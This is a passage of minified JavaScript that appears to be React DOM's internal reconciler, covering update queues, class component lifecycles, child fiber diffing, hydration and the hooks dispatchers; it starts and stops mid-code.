i={eventTime:n.eventTime,lane:n.lane,tag:n.tag,payload:n.payload,callback:n.callback,next:null};null===o?r=o=i:o=o.next=i,n=n.next}while(null!==n);null===o?r=o=t:o=o.next=t}else r=o=t;return n={baseState:a.baseState,firstBaseUpdate:r,lastBaseUpdate:o,shared:a.shared,effects:a.effects},void(e.updateQueue=n)}null===(e=n.lastBaseUpdate)?n.firstBaseUpdate=t:e.next=t,n.lastBaseUpdate=t}function fo(e,t,n,a){var o=e.updateQueue;lo=!1;var i=o.firstBaseUpdate,l=o.lastBaseUpdate,s=o.shared.pending;if(null!==s){o.shared.pending=null;var p=s,c=p.next;p.next=null,null===l?i=c:l.next=c,l=p;var d=e.alternate;if(null!==d){var u=(d=d.updateQueue).lastBaseUpdate;u!==l&&(null===u?d.firstBaseUpdate=c:u.next=c,d.lastBaseUpdate=p)}}if(null!==i){for(u=o.baseState,l=0,d=c=p=null;;){s=i.lane;var m=i.eventTime;if((a&s)===s){null!==d&&(d=d.next={eventTime:m,lane:0,tag:i.tag,payload:i.payload,callback:i.callback,next:null});e:{var f=e,h=i;switch(s=t,m=n,h.tag){case 1:if("function"==typeof(f=h.payload)){u=f.call(m,u,s);break e}u=f;break e;case 3:f.flags=-4097&f.flags|64;case 0:if(null==(s="function"==typeof(f=h.payload)?f.call(m,u,s):f))break e;u=r({},u,s);break e;case 2:lo=!0}}null!==i.callback&&(e.flags|=32,null===(s=o.effects)?o.effects=[i]:s.push(i))}else m={eventTime:m,lane:s,tag:i.tag,payload:i.payload,callback:i.callback,next:null},null===d?(c=d=m,p=u):d=d.next=m,l|=s;if(null===(i=i.next)){if(null===(s=o.shared.pending))break;i=s.next,s.next=null,o.lastBaseUpdate=s,o.shared.pending=null}}null===d&&(p=u),o.baseState=p,o.firstBaseUpdate=c,o.lastBaseUpdate=d,Vl|=l,e.lanes=l,e.memoizedState=u}}function ho(e,t,n){if(e=t.effects,t.effects=null,null!==e)for(t=0;t<e.length;t++){var a=e[t],r=a.callback;if(null!==r){if(a.callback=null,a=n,"function"!=typeof r)throw Error(i(191,r));r.call(a)}}}var go=(new a.Component).refs;function vo(e,t,n,a){n=null==(n=n(a,t=e.memoizedState))?t:r({},t,n),e.memoizedState=n,0===e.lanes&&(e.updateQueue.baseState=n)}var _o={isMounted:function(e){return!!(e=e._reactInternals)&&Ke(e)===e},enqueueSetState:function(e,t,n){e=e._reactInternals;var a=ds(),r=us(e),o=co(a,r);o.payload=t,null!=n&&(o.callback=n),uo(e,o),ms(e,r,a)},enqueueReplaceState:function(e,t,n){e=e._reactInternals;var a=ds(),r=us(e),o=co(a,r);o.tag=1,o.payload=t,null!=n&&(o.callback=n),uo(e,o),ms(e,r,a)},enqueueForceUpdate:function(e,t){e=e._reactInternals;var n=ds(),a=us(e),r=co(n,a);r.tag=2,null!=t&&(r.callback=t),uo(e,r),ms(e,a,n)}};function wo(e,t,n,a,r,o,i){return"function"==typeof(e=e.stateNode).shouldComponentUpdate?e.shouldComponentUpdate(a,o,i):!(t.prototype&&t.prototype.isPureReactComponent&&ua(n,a)&&ua(r,o))}function bo(e,t,n){var a=!1,r=ur,o=t.contextType;return"object"==typeof o&&null!==o?o=io(o):(r=vr(t)?hr:mr.current,o=(a=null!=(a=t.contextTypes))?gr(e,r):ur),t=new t(n,o),e.memoizedState=null!==t.state&&void 0!==t.state?t.state:null,t.updater=_o,e.stateNode=t,t._reactInternals=e,a&&((e=e.stateNode).__reactInternalMemoizedUnmaskedChildContext=r,e.__reactInternalMemoizedMaskedChildContext=o),t}function xo(e,t,n,a){e=t.state,"function"==typeof t.componentWillReceiveProps&&t.componentWillReceiveProps(n,a),"function"==typeof t.UNSAFE_componentWillReceiveProps&&t.UNSAFE_componentWillReceiveProps(n,a),t.state!==e&&_o.enqueueReplaceState(t,t.state,null)}function yo(e,t,n,a){var r=e.stateNode;r.props=n,r.state=e.memoizedState,r.refs=go,so(e);var o=t.contextType;"object"==typeof o&&null!==o?r.context=io(o):(o=vr(t)?hr:mr.current,r.context=gr(e,o)),fo(e,n,r,a),r.state=e.memoizedState,"function"==typeof(o=t.getDerivedStateFromProps)&&(vo(e,t,o,n),r.state=e.memoizedState),"function"==typeof t.getDerivedStateFromProps||"function"==typeof r.getSnapshotBeforeUpdate||"function"!=typeof r.UNSAFE_componentWillMount&&"function"!=typeof r.componentWillMount||(t=r.state,"function"==typeof r.componentWillMount&&r.componentWillMount(),"function"==typeof r.UNSAFE_componentWillMount&&r.UNSAFE_componentWillMount(),t!==r.state&&_o.enqueueReplaceState(r,r.state,null),fo(e,n,r,a),r.state=e.memoizedState),"function"==typeof r.componentDidMount&&(e.flags|=4)}var ko=Array.isArray;function Eo(e,t,n){if(null!==(e=n.ref)&&"function"!=typeof e&&"object"!=typeof e){if(n._owner){if(n=n._owner){if(1!==n.tag)throw Error(i(309));var a=n.stateNode}if(!a)throw Error(i(147,e));var r=""+e;return null!==t&&null!==t.ref&&"function"==typeof t.ref&&t.ref._stringRef===r?t.ref:(t=function(e){var t=a.refs;t===go&&(t=a.refs={}),null===e?delete t[r]:t[r]=e},t._stringRef=r,t)}if("string"!=typeof e)throw Error(i(284));if(!n._owner)throw Error(i(290,e))}return e}function Co(e,t){if("textarea"!==e.type)throw Error(i(31,"[object Object]"===Object.prototype.toString.call(t)?"object with keys {"+Object.keys(t).join(", ")+"}":t))}function So(e){function t(t,n){if(e){var a=t.lastEffect;null!==a?(a.nextEffect=n,t.lastEffect=n):t.firstEffect=t.lastEffect=n,n.nextEffect=null,n.flags=8}}function n(n,a){if(!e)return null;for(;null!==a;)t(n,a),a=a.sibling;return null}function a(e,t){for(e=new Map;null!==t;)null!==t.key?e.set(t.key,t):e.set(t.index,t),t=t.sibling;return e}function r(e,t){return(e=Us(e,t)).index=0,e.sibling=null,e}function o(t,n,a){return t.index=a,e?null!==(a=t.alternate)?(a=a.index)<n?(t.flags=2,n):a:(t.flags=2,n):n}function l(t){return e&&null===t.alternate&&(t.flags=2),t}function s(e,t,n,a){return null===t||6!==t.tag?((t=Ks(n,e.mode,a)).return=e,t):((t=r(t,n)).return=e,t)}function p(e,t,n,a){return null!==t&&t.elementType===n.type?((a=r(t,n.props)).ref=Eo(e,t,n),a.return=e,a):((a=$s(n.type,n.key,n.props,null,e.mode,a)).ref=Eo(e,t,n),a.return=e,a)}function c(e,t,n,a){return null===t||4!==t.tag||t.stateNode.containerInfo!==n.containerInfo||t.stateNode.implementation!==n.implementation?((t=Xs(n,e.mode,a)).return=e,t):((t=r(t,n.children||[])).return=e,t)}function d(e,t,n,a,o){return null===t||7!==t.tag?((t=Gs(n,e.mode,a,o)).return=e,t):((t=r(t,n)).return=e,t)}function u(e,t,n){if("string"==typeof t||"number"==typeof t)return(t=Ks(""+t,e.mode,n)).return=e,t;if("object"==typeof t&&null!==t){switch(t.$$typeof){case y:return(n=$s(t.type,t.key,t.props,null,e.mode,n)).ref=Eo(e,null,t),n.return=e,n;case k:return(t=Xs(t,e.mode,n)).return=e,t}if(ko(t)||W(t))return(t=Gs(t,e.mode,n,null)).return=e,t;Co(e,t)}return null}function m(e,t,n,a){var r=null!==t?t.key:null;if("string"==typeof n||"number"==typeof n)return null!==r?null:s(e,t,""+n,a);if("object"==typeof n&&null!==n){switch(n.$$typeof){case y:return n.key===r?n.type===E?d(e,t,n.props.children,a,r):p(e,t,n,a):null;case k:return n.key===r?c(e,t,n,a):null}if(ko(n)||W(n))return null!==r?null:d(e,t,n,a,null);Co(e,n)}return null}function f(e,t,n,a,r){if("string"==typeof a||"number"==typeof a)return s(t,e=e.get(n)||null,""+a,r);if("object"==typeof a&&null!==a){switch(a.$$typeof){case y:return e=e.get(null===a.key?n:a.key)||null,a.type===E?d(t,e,a.props.children,r,a.key):p(t,e,a,r);case k:return c(t,e=e.get(null===a.key?n:a.key)||null,a,r)}if(ko(a)||W(a))return d(t,e=e.get(n)||null,a,r,null);Co(t,a)}return null}function h(r,i,l,s){for(var p=null,c=null,d=i,h=i=0,g=null;null!==d&&h<l.length;h++){d.index>h?(g=d,d=null):g=d.sibling;var v=m(r,d,l[h],s);if(null===v){null===d&&(d=g);break}e&&d&&null===v.alternate&&t(r,d),i=o(v,i,h),null===c?p=v:c.sibling=v,c=v,d=g}if(h===l.length)return n(r,d),p;if(null===d){for(;h<l.length;h++)null!==(d=u(r,l[h],s))&&(i=o(d,i,h),null===c?p=d:c.sibling=d,c=d);return p}for(d=a(r,d);h<l.length;h++)null!==(g=f(d,r,h,l[h],s))&&(e&&null!==g.alternate&&d.delete(null===g.key?h:g.key),i=o(g,i,h),null===c?p=g:c.sibling=g,c=g);return e&&d.forEach((function(e){return t(r,e)})),p}function g(r,l,s,p){var c=W(s);if("function"!=typeof c)throw Error(i(150));if(null==(s=c.call(s)))throw Error(i(151));for(var d=c=null,h=l,g=l=0,v=null,_=s.next();null!==h&&!_.done;g++,_=s.next()){h.index>g?(v=h,h=null):v=h.sibling;var w=m(r,h,_.value,p);if(null===w){null===h&&(h=v);break}e&&h&&null===w.alternate&&t(r,h),l=o(w,l,g),null===d?c=w:d.sibling=w,d=w,h=v}if(_.done)return n(r,h),c;if(null===h){for(;!_.done;g++,_=s.next())null!==(_=u(r,_.value,p))&&(l=o(_,l,g),null===d?c=_:d.sibling=_,d=_);return c}for(h=a(r,h);!_.done;g++,_=s.next())null!==(_=f(h,r,g,_.value,p))&&(e&&null!==_.alternate&&h.delete(null===_.key?g:_.key),l=o(_,l,g),null===d?c=_:d.sibling=_,d=_);return e&&h.forEach((function(e){return t(r,e)})),c}return function(e,a,o,s){var p="object"==typeof o&&null!==o&&o.type===E&&null===o.key;p&&(o=o.props.children);var c="object"==typeof o&&null!==o;if(c)switch(o.$$typeof){case y:e:{for(c=o.key,p=a;null!==p;){if(p.key===c){if(7===p.tag){if(o.type===E){n(e,p.sibling),(a=r(p,o.props.children)).return=e,e=a;break e}}else if(p.elementType===o.type){n(e,p.sibling),(a=r(p,o.props)).ref=Eo(e,p,o),a.return=e,e=a;break e}n(e,p);break}t(e,p),p=p.sibling}o.type===E?((a=Gs(o.props.children,e.mode,s,o.key)).return=e,e=a):((s=$s(o.type,o.key,o.props,null,e.mode,s)).ref=Eo(e,a,o),s.return=e,e=s)}return l(e);case k:e:{for(p=o.key;null!==a;){if(a.key===p){if(4===a.tag&&a.stateNode.containerInfo===o.containerInfo&&a.stateNode.implementation===o.implementation){n(e,a.sibling),(a=r(a,o.children||[])).return=e,e=a;break e}n(e,a);break}t(e,a),a=a.sibling}(a=Xs(o,e.mode,s)).return=e,e=a}return l(e)}if("string"==typeof o||"number"==typeof o)return o=""+o,null!==a&&6===a.tag?(n(e,a.sibling),(a=r(a,o)).return=e,e=a):(n(e,a),(a=Ks(o,e.mode,s)).return=e,e=a),l(e);if(ko(o))return h(e,a,o,s);if(W(o))return g(e,a,o,s);if(c&&Co(e,o),void 0===o&&!p)switch(e.tag){case 1:case 22:case 0:case 11:case 15:throw Error(i(152,G(e.type)||"Component"))}return n(e,a)}}var Mo=So(!0),Lo=So(!1),No={},Zo=pr(No),Po=pr(No),zo=pr(No);function Ao(e){if(e===No)throw Error(i(174));return e}function Bo(e,t){switch(dr(zo,t),dr(Po,e),dr(Zo,No),e=t.nodeType){case 9:case 11:t=(t=t.documentElement)?t.namespaceURI:me(null,"");break;default:t=me(t=(e=8===e?t.parentNode:t).namespaceURI||null,e=e.tagName)}cr(Zo),dr(Zo,t)}function Ho(){cr(Zo),cr(Po),cr(zo)}function To(e){Ao(zo.current);var t=Ao(Zo.current),n=me(t,e.type);t!==n&&(dr(Po,e),dr(Zo,n))}function Ro(e){Po.current===e&&(cr(Zo),cr(Po))}var Oo=pr(0);function jo(e){for(var t=e;null!==t;){if(13===t.tag){var n=t.memoizedState;if(null!==n&&(null===(n=n.dehydrated)||"$?"===n.data||"$!"===n.data))return t}else if(19===t.tag&&void 0!==t.memoizedProps.revealOrder){if(0!=(64&t.flags))return t}else if(null!==t.child){t.child.return=t,t=t.child;continue}if(t===e)break;for(;null===t.sibling;){if(null===t.return||t.return===e)return null;t=t.return}t.sibling.return=t.return,t=t.sibling}return null}var Vo=null,Fo=null,Wo=!1;function Do(e,t){var n=Ds(5,null,null,0);n.elementType="DELETED",n.type="DELETED",n.stateNode=t,n.return=e,n.flags=8,null!==e.lastEffect?(e.lastEffect.nextEffect=n,e.lastEffect=n):e.firstEffect=e.lastEffect=n}function Io(e,t){switch(e.tag){case 5:var n=e.type;return null!==(t=1!==t.nodeType||n.toLowerCase()!==t.nodeName.toLowerCase()?null:t)&&(e.stateNode=t,!0);case 6:return null!==(t=""===e.pendingProps||3!==t.nodeType?null:t)&&(e.stateNode=t,!0);default:return!1}}function Uo(e){if(Wo){var t=Fo;if(t){var n=t;if(!Io(e,t)){if(!(t=qa(n.nextSibling))||!Io(e,t))return e.flags=-1025&e.flags|2,Wo=!1,void(Vo=e);Do(Vo,n)}Vo=e,Fo=qa(t.firstChild)}else e.flags=-1025&e.flags|2,Wo=!1,Vo=e}}function $o(e){for(e=e.return;null!==e&&5!==e.tag&&3!==e.tag&&13!==e.tag;)e=e.return;Vo=e}function Go(e){if(e!==Vo)return!1;if(!Wo)return $o(e),Wo=!0,!1;var t=e.type;if(5!==e.tag||"head"!==t&&"body"!==t&&!Ia(t,e.memoizedProps))for(t=Fo;t;)Do(e,t),t=qa(t.nextSibling);if($o(e),13===e.tag){if(!(e=null!==(e=e.memoizedState)?e.dehydrated:null))throw Error(i(317));e:{for(e=e.nextSibling,t=0;e;){if(8===e.nodeType){var n=e.data;if("/$"===n){if(0===t){Fo=qa(e.nextSibling);break e}t--}else"$"!==n&&"$!"!==n&&"$?"!==n||t++}e=e.nextSibling}Fo=null}}else Fo=Vo?qa(e.stateNode.nextSibling):null;return!0}function qo(){Fo=Vo=null,Wo=!1}var Ko=[];function Xo(){for(var e=0;e<Ko.length;e++)Ko[e]._workInProgressVersionPrimary=null;Ko.length=0}var Qo=x.ReactCurrentDispatcher,Jo=x.ReactCurrentBatchConfig,Yo=0,ei=null,ti=null,ni=null,ai=!1,ri=!1;function oi(){throw Error(i(321))}function ii(e,t){if(null===t)return!1;for(var n=0;n<t.length&&n<e.length;n++)if(!ca(e[n],t[n]))return!1;return!0}function li(e,t,n,a,r,o){if(Yo=o,ei=t,t.memoizedState=null,t.updateQueue=null,t.lanes=0,Qo.current=null===e||null===e.memoizedState?Ai:Bi,e=n(a,r),ri){o=0;do{if(ri=!1,!(25>o))throw Error(i(301));o+=1,ni=ti=null,t.updateQueue=null,Qo.current=Hi,e=n(a,r)}while(ri)}if(Qo.current=zi,t=null!==ti&&null!==ti.next,Yo=0,ni=ti=ei=null,ai=!1,t)throw Error(i(300));return e}function si(){var e={memoizedState:null,baseState:null,baseQueue:null,queue:null,next:null};return null===ni?ei.memoizedState=ni=e:ni=ni.next=e,ni}function pi(){if(null===ti){var e=ei.alternate;e=null!==e?e.memoizedState:null}else e=ti.next;var t=null===ni?ei.memoizedState:ni.next;if(null!==t)ni=t,ti=e;else{if(null===e)throw Error(i(310));e={memoizedState:(ti=e).memoizedState,baseState:ti.baseState,baseQueue:ti.baseQueue,queue:ti.queue,next:null},null===ni?ei.memoizedState=ni=e:ni=ni.next=e}return ni}function ci(e,t){return"function"==typeof t?t(e):t}function di(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=ti,r=a.baseQueue,o=n.pending;if(null!==o){if(null!==r){var l=r.next;r.next=o.next,o.next=l}a.baseQueue=r=o,n.pending=null}if(null!==r){r=r.next,a=a.baseState;var s=l=o=null,p=r;do{var c=p.lane;if((Yo&c)===c)null!==s&&(s=s.next={lane:0,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null}),a=p.eagerReducer===e?p.eagerState:e(a,p.action);else{var d={lane:c,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null};null===s?(l=s=d,o=a):s=s.next=d,ei.lanes|=c,Vl|=c}p=p.next}while(null!==p&&p!==r);null===s?o=a:s.next=l,ca(a,t.memoizedState)||(Ri=!0),t.memoizedState=a,t.baseState=o,t.baseQueue=s,n.lastRenderedState=a}return[t.memoizedState,n.dispatch]}function ui(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=n.dispatch,r=n.pending,o=t.memoizedState;if(null!==r){n.pending=null;var l=r=r.next;do{o=e(o,l.action),l=l.next}while(l!==r);ca(o,t.memoizedState)||(Ri=!0),t.memoizedState=o,null===t.baseQueue&&(t.baseState=o),n.lastRenderedState=o}return[o,a]}function mi(e,t,n){var a=t._getVersion;a=a(t._source);var r=t._workInProgressVersionPrimary;if(null!==r?e=r===a:(e=e.mutableReadLanes,(e=(Yo&e)===e)&&(t._workInProgressVersionPrimary=a,Ko.push(t))),e)return n(t._source);throw Ko.push(t),Error(i(350))}function fi(e,t,n,a){var r=zl;if(null===r)throw Error(i(349));var o=t._getVersion,l=o(t._source),s=Qo.current,p=s.useState((function(){return mi(r,t,n)})),c=p[1],d=p[0];p=ni;var u=e.memoizedState,m=u.refs,f=m.getSnapshot,h=u.source;u=u.subscribe;var g=ei;return e.memoizedState={refs:m,source:t,subscribe:a},s.useEffect((function(){m.getSnapshot=n,m.setSnapshot=c;var e=o(t._source);if(!ca(l,e)){e=n(t._source),ca(d,e)||(c(e),e=us(g),r.mutableReadLanes|=e&r.pendingLanes),e=r.mutableReadLanes,r.entangledLanes|=e;for(var a=r.entanglements,i=e;0<i;){var s=31-Dt(i),p=1<<s;a[s]|=e,i&=~p}}}),[n,t,a]),s.useEffect((function(){return a(t._source,(function(){var e=m.getSnapshot,n=m.setSnapshot;try{n(e(t._source));var a=us(g);r.mutableReadLanes|=a&r.pendingLanes}catch(e){n((function(){throw e}))}}))}),[t,a]),ca(f,n)&&ca(h,t)&&ca(u,a)||((e={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:d}).dispatch=c=Pi.bind(null,ei,e),p.queue=e,p.baseQueue=null,d=mi(r,t,n),p.memoizedState=p.baseState=d),d}function hi(e,t,n){return fi(pi(),e,t,n)}function gi(e){var t=si();return"function"==typeof e&&(e=e()),t.memoizedState=t.baseState=e,e=(e=t.queue={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:e}).dispatch=Pi.bind(null,ei,e),[t.memoizedState,e]}function vi(e,t,n,a){return e={tag:e,create:t,destroy:n,deps:a,next:null},null===(t=ei.updateQueue)?(t={lastEffect:null},ei.updateQueue=t,t.lastEffect=e.next=e):null===(n=t.lastEffect)?t.lastEffect=e.next=e:(a=n.next,n.next=e,e.next=a,t.lastEffect=e),e}function _i(e){return e={current:e},si().memoizedState=e}function wi(){return pi().memoizedState}function bi(e,t,n,a){var r=si();ei.flags|=e,r.memoizedState=vi(1|t,n,void 0,void 0===a?null:a)}function xi(e,t,n,a){var r=pi();a=void 0===a?null:a;var o=void 0;if(null!==ti){var i=ti.memoizedState;if(o=i.destroy,null!==a&&ii(a,i.deps))return void vi(t,n,o,a)}ei.flags|=e,r.memoizedState=vi(1|t,n,o,a)}function yi(e,t){return bi(516,4,e,t)}function ki(e,t){return xi(516,4,e,t)}function Ei(e,t){return xi(4,2,e,t)}function Ci(e,t){return"function"==typeof t?(e=e(),t(e),function(){t(null)}):null!=t?(e=e(),t.current=e,function(){t.current=null}):void 0}function Si(e,t,n){return n=null!=n?n.concat([e]):null,xi(4,2,Ci.bind(null,t,e),n)}function Mi(){}function Li(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(n.memoizedState=[e,t],e)}function Ni(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(e=e(),n.memoizedState=[e,t],e)}function Zi(e,t){var n=Ir();$r(98>n?98:n,(function(){e(!0)})),$r(97<n?97:n,(function(){var n=Jo.transition;Jo.transition=1;try{e(!1),t()}finally{Jo.transition=n}}))}function Pi(e,t,n){var a=ds(),r=us(e),o={lane:r,action:n,eagerReducer:null,eagerState:null,next:null},i=t.pending;if(null===i?o.next=o:(o.next=i.next,i.next=o),t.pending=o,i=e.alternate,e===ei||null!==i&&i===ei)ri=ai=!0;else{if(0===e.lanes&&(null===i||0===i.lanes)&&null!==(i=t.lastRenderedReducer))try{var l=t.lastRenderedState,s=i(l,n);if(o.eagerReducer=i,o.eagerState=s,ca(s,l))return}catch(e){}ms(e,r,a)}}var zi={readContext:io,useCallback:oi,useContext:oi,useEffect:oi,useImperativeHandle:oi,useLayoutEffect:oi,useMemo:oi,useReducer:oi,useRef:oi,useState:oi,useDebugValue:oi,useDeferredValue:oi,useTransition:oi,useMutableSource:oi,useOpaqueIdentifier:oi,unstable_isNewReconciler:!1},Ai={readContext:io,useCallback:function(e,t){return si().memoizedState=[e,void 0===t?null:t],e},useContext:io,useEffect:yi,useImperativeHandle:function(e,t,n){return n=null!=n?n.concat([e]):null,bi(4,2,Ci.bind(null,t,e),n)},useLayoutEffect:function(e,t){return bi(4,2,e,t)},useMemo:function(e,t){var n=si();return t=void 0===t?null:t,e=e(),n.memoizedState=[e,t],e},useReducer:function(e,t,n){var a=si();return t=void 0!==n?n(t):t,a.memoizedState=a.baseState=t,e=(e=a.queue={pending:null,dispatch:null,lastRenderedReducer:e,lastRenderedState:t}).dispatch=Pi.bind(null,ei,e),[a.memoizedState,e]},useRef:_i,useState:gi,useDebugValue:Mi,useDeferredValue:function(e){var t=gi(e),n=t[0],a=t[1];return yi((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=gi(!1),t=e[0];return _i(e=Zi.bind(null,e[1])),[e,t]},useMutableSource:function(e,t,n){var a=si();return a.memoizedState={refs:{getSnapshot:t,setSnapshot:null},source:e,subscribe:n},fi(a,e,t,n)},useOpaqueIdentifier:function(){if(Wo){var e=!1,t=function(e){return{$$typeof:H,toString:e,valueOf:e}}((function(){throw e||(e=!0,n("r:"+(Xa++).toString(36))),Error(i(355))})),n=gi(t)[1];return 0==(2&ei.mode)&&(ei.flags|=516,vi(5,(function(){n("r:"+(Xa++).toString(36))}),void 0,null)),t}return gi(t="r:"+(Xa++).toString(36)),t},unstable_isNewReconciler:!1},Bi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:di,useRef:wi,useState:function(){return di(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=di(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=di(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return di(ci)[0]},unstable_isNewReconciler:!1},Hi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:ui,useRef:wi,useState:function(){return ui(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=ui(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=ui(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return ui(ci)[0]},unstable_isNewReconciler:!1},Ti=x.ReactCurrentOwner,Ri=!1;function Oi(e,t,n,a){t.child=null===e?Lo(t,null,n,a):Mo(t,e.child,n,a)}function ji(e,t,n,a,r){n=n.render;var o=t.ref;return oo(t,r),a=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,a,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Vi(e,t,n,a,r,o){if(null===e){var i=n.type;return"function"!=typeof i||Is(i)||void 0!==i.defaultProps||null!==n.compare||void 0!==n.defaultProps?((e=$s(n.type,null,a,t,t.mode,o)).ref=t.ref,e.return=t,t.child=e):(t.tag=15,t.type=i,Fi(e,t,i,a,r,o))}return i=e.child,0==(r&o)&&(r=i.memoizedProps,(n=null!==(n=n.compare)?n:ua)(r,a)&&e.ref===t.ref)?rl(e,t,o):(t.flags|=1,(e=Us(i,a)).ref=t.ref,e.return=t,t.child=e)}function Fi(e,t,n,a,r,o){if(null!==e&&ua(e.memoizedProps,a)&&e.ref===t.ref){if(Ri=!1,0==(o&r))return t.lanes=e.lanes,rl(e,t,o);0!=(16384&e.flags)&&(Ri=!0)}return Ii(e,t,n,a,o)}function Wi(e,t,n){var a=t.pendingProps,r=a.children,o=null!==e?e.memoizedState:null;if("hidden"===a.mode||"unstable-defer-without-hiding"===a.mode)if(0==(4&t.mode))t.memoizedState={baseLanes:0},xs(0,n);else{if(0==(1073741824&n))return e=null!==o?o.baseLanes|n:n,t.lanes=t.childLanes=1073741824,t.memoizedState={baseLanes:e},xs(0,e),null;t.memoizedState={baseLanes:0},xs(0,null!==o?o.baseLanes:n)}else null!==o?(a=o.baseLanes|n,t.memoizedState=null):a=n,xs(0,a);return Oi(e,t,r,n),t.child}function Di(e,t){var n=t.ref;(null===e&&null!==n||null!==e&&e.ref!==n)&&(t.flags|=128)}function Ii(e,t,n,a,r){var o=vr(n)?hr:mr.current;return o=gr(t,o),oo(t,r),n=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,n,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Ui(e,t,n,a,r){if(vr(n)){var o=!0;xr(t)}else o=!1;if(oo(t,r),null===t.stateNode)null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),bo(t,n,a),yo(t,n,a,r),a=!0;else if(null===e){var i=t.stateNode,l=t.memoizedProps;i.props=l;var s=i.context,p=n.contextType;p="object"==typeof p&&null!==p?io(p):gr(t,p=vr(n)?hr:mr.current);var c=n.getDerivedStateFromProps,d="function"==typeof c||"function"==typeof i.getSnapshotBeforeUpdate;d||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==a||s!==p)&&xo(t,i,a,p),lo=!1;var u=t.memoizedState;i.state=u,fo(t,a,i,r),s=t.memoizedState,l!==a||u!==s||fr.current||lo?("function"==typeof c&&(vo(t,n,c,a),s=t.memoizedState),(l=lo||wo(t,n,l,a,u,s,p))?(d||"function"!=typeof i.UNSAFE_componentWillMount&&"function"!=typeof i.componentWillMount||("function"==typeof i.componentWillMount&&i.componentWillMount(),"function"==typeof i.UNSAFE_componentWillMount&&i.UNSAFE_componentWillMount()),"function"==typeof i.componentDidMount&&(t.flags|=4)):("function"==typeof i.componentDidMount&&(t.flags|=4),t.memoizedProps=a,t.memoizedState=s),i.props=a,i.state=s,i.context=p,a=l):("function"==typeof i.componentDidMount&&(t.flags|=4),a=!1)}else{i=t.stateNode,po(e,t),l=t.memoizedProps,p=t.type===t.elementType?l:Qr(t.type,l),i.props=p,d=t.pendingProps,u=i.context,s="object"==typeof(s=n.contextType)&&null!==s?io(s):gr(t,s=vr(n)?hr:mr.current);var m=n.getDerivedStateFromProps;(c="function"==typeof m||"function"==typeof i.getSnapshotBeforeUpdate)||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==d||u!==s)&&xo(t,i,a,s),lo=!1,u=t.memoizedState,i.state=u,fo(t,a,i,r);var f=t.memoizedState;l!==d||u!==f||fr.current||lo?("function"==typeof m&&(vo(t,n,m,a),f=t.memoizedState),(p=lo||wo(t,n,p,a,u,f,s))?(c||"function"!=typeof i.UNSAFE_componentWillUpdate&&"function"!=typeof i.componentWillUpdate||("function"==typeof i.componentWillUpdate&&i.componentWillUpdate(a,f,s),"function"==typeof i.UNSAFE_componentWillUpdate&&i.UNSAFE_componentWillUpdate(a,f,s)),"function"==typeof i.componentDidUpdate&&(t.flags|=4),"function"==typeof i.getSnapshotBeforeUpdate&&(t.flags|=256)):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),t.memoizedProps=a,t.memoizedState=f),i.props=a,i.state=f,i.context=s,a=p):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),a=!1)}return $i(e,t,n,a,o,r)}function $i(e,t,n,a,r,o){Di(e,t);var i=0!=(64&t.flags);if(!a&&!i)return r&&yr(t,n,!1),rl(e,t,o);a=t.stateNode,Ti.current=t;var l=i&&"function"!=typeof n.getDerivedStateFromError?null:a.render();return t.flags|=1,null!==e&&i?(t.child=Mo(t,e.child,null,o),t.child=Mo(t,null,l,o)):Oi(e,t,l,o),t.memoizedState=a.state,r&&yr(t,n,!0),t.child}function Gi(e){var t=e.stateNode;t.pendingContext?wr(0,t.pendingContext,t.pendingContext!==t.context):t.context&&wr(0,t.context,!1),Bo(e,t.containerInfo)}var qi,Ki,Xi,Qi,Ji={dehydrated:null,retryLane:0};function Yi(e,t,n){var a,r=t.pendingProps,o=Oo.current,i=!1;return(a=0!=(64&t.flags))||(a=(null===e||null!==e.memoizedState)&&0!=(2&o)),a?(i=!0,t.flags&=-65):null!==e&&null===e.memoizedState||void 0===r.fallback||!0===r.unstable_avoidThisFallback||(o|=1),dr(Oo,1&o),null===e?(void 